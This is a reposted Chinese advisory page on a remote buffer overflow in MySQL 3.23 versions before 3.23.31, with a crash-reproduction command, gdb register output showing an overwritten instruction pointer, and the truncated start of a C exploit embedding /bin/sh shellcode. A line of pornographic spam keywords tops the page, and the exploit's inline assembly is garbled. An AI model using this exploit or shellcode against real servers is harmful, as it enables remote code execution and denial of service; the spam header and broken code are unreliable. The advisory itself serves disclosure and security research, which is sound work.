日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

mysql溢出漏洞,Mysql 远程缓冲区溢出漏洞

發布時間:2024/3/26 数据库 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 mysql溢出漏洞,Mysql 远程缓冲区溢出漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Mysql 遠程緩沖區溢出漏洞

發布日期:2001-01-27

更新日期:2001-01-27

受影響系統:T.C.X DataKonsult MySQL 3.23.30

T.C.X DataKonsult MySQL 3.23.29

T.C.X DataKonsult MySQL 3.23.28

T.C.X DataKonsult MySQL 3.23.27

T.C.X DataKonsult MySQL 3.23.26

T.C.X DataKonsult MySQL 3.23.25

T.C.X DataKonsult MySQL 3.23.24

T.C.X DataKonsult MySQL 3.23.23不受影響系統:T.C.X DataKonsult MySQL 3.23.31描述:BUGTRAQ ID: 2262

CVE(CAN) ID: CAN-2001-1274

MySQL是一個開放源代碼的自由數據庫軟件。3.23.31以前的版本都存在一個緩沖區

溢出漏洞。

通過使用一個特別長的字符串作為SELECT語句的參數,可能導致mysqld發生緩沖區

溢出。堆棧中的數據可能被覆蓋或修改,攻擊者可能遠程獲取mysqld的運行權限或

使mysqld數據庫崩潰。

測試方法:警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!Joao Gouveia提供了下列測試步驟:

> On one terminal:

>

> spike:/var/mysql # /sbin/init.d/mysql start

> Starting service MySQL.

> Starting mysqld daemon with databases from /var/mysql

> done

> spike:/var/mysql #

>

>

> On the other terminal:

>

> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'

> Enter password:

> (hanged..^C)

>

>

> On the first terminal i got:

>

> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault

> nohup

> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin

> g "$@" >>$err_log 2>&1>

> Number of processes running now: 0

> mysqld restarted on Fri Jan 12 07:10:54 WET 2001

> mysqld daemon ended

>

>

> gdb shows the following:

>

> (gdb) run

> Starting program: /usr/sbin/mysqld

> [New Thread 16897 (manager thread)]

> [New Thread 16891 (initial thread)]

> [New Thread 16898]

> /usr/sbin/mysqld: ready for connections

> [New Thread 16916]

> [Switching to Thread 16916]

>

> Program received signal SIGSEGV, Segmentation fault.

> 0x41414141 in ?? ()

> (gdb) info all-registers

> eax 0x1 1

> ecx 0x68 104

> edx 0x8166947 135686471

> ebx 0x41414141 1094795585

> esp 0xbf5ff408 0xbf5ff408

> ebp 0x41414141 0x41414141

> esi 0x41414141 1094795585

> edi 0x0 0

> eip 0x41414141 0x41414141

> eflags 0x10246 66118

> cs 0x23 35

> ss 0x2b 43

> ds 0x2b 43

> es 0x2b 43

> fs 0x0 0

> gs 0x0 0

> (gdb)

>

Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一個測試程序:

#include

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 130

#define NOP 0x90

// Our EVIL code...

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned

long get_sp(void) {

__asm__("movl %esp,陎");

}

// Where it all happens...

main(int argc, char *argv[])

{

char *buffer, *ptr, tmp[1500];

long *addr_ptr, addr;

int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;

printf("\nMySQL [al versions < 3.23.31] Local Exploit by

lms@ispgaya.pt\n\n");

if (argc==2) offset=atoi(argv[1]);

else

printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");

printf("Trying to allocate memory for buffer (%d bytes)...",bsize);

if (!(buffer = malloc(bsize))) {

printf("ERROR!\n");

printf("Couldn't allocate memory...\n");

printf("Exiting...\n");

exit(0);

}

printf("SUCCESS!\n");

addr=get_sp()-offset;

printf("Using address : 0x%x\n", addr);

printf("Offset : %d\n",offset);

標簽:

版權申明:本站文章部分自網絡,如有侵權,請聯系:west999com@outlook.com

特別注意:本站所有轉載文章言論不代表本站觀點,本站所提供的攝影照片,插畫,設計作品,如需使用,請與原作者聯系,版權歸原作者所有

總結

以上是生活随笔為你收集整理的mysql溢出漏洞,Mysql 远程缓冲区溢出漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。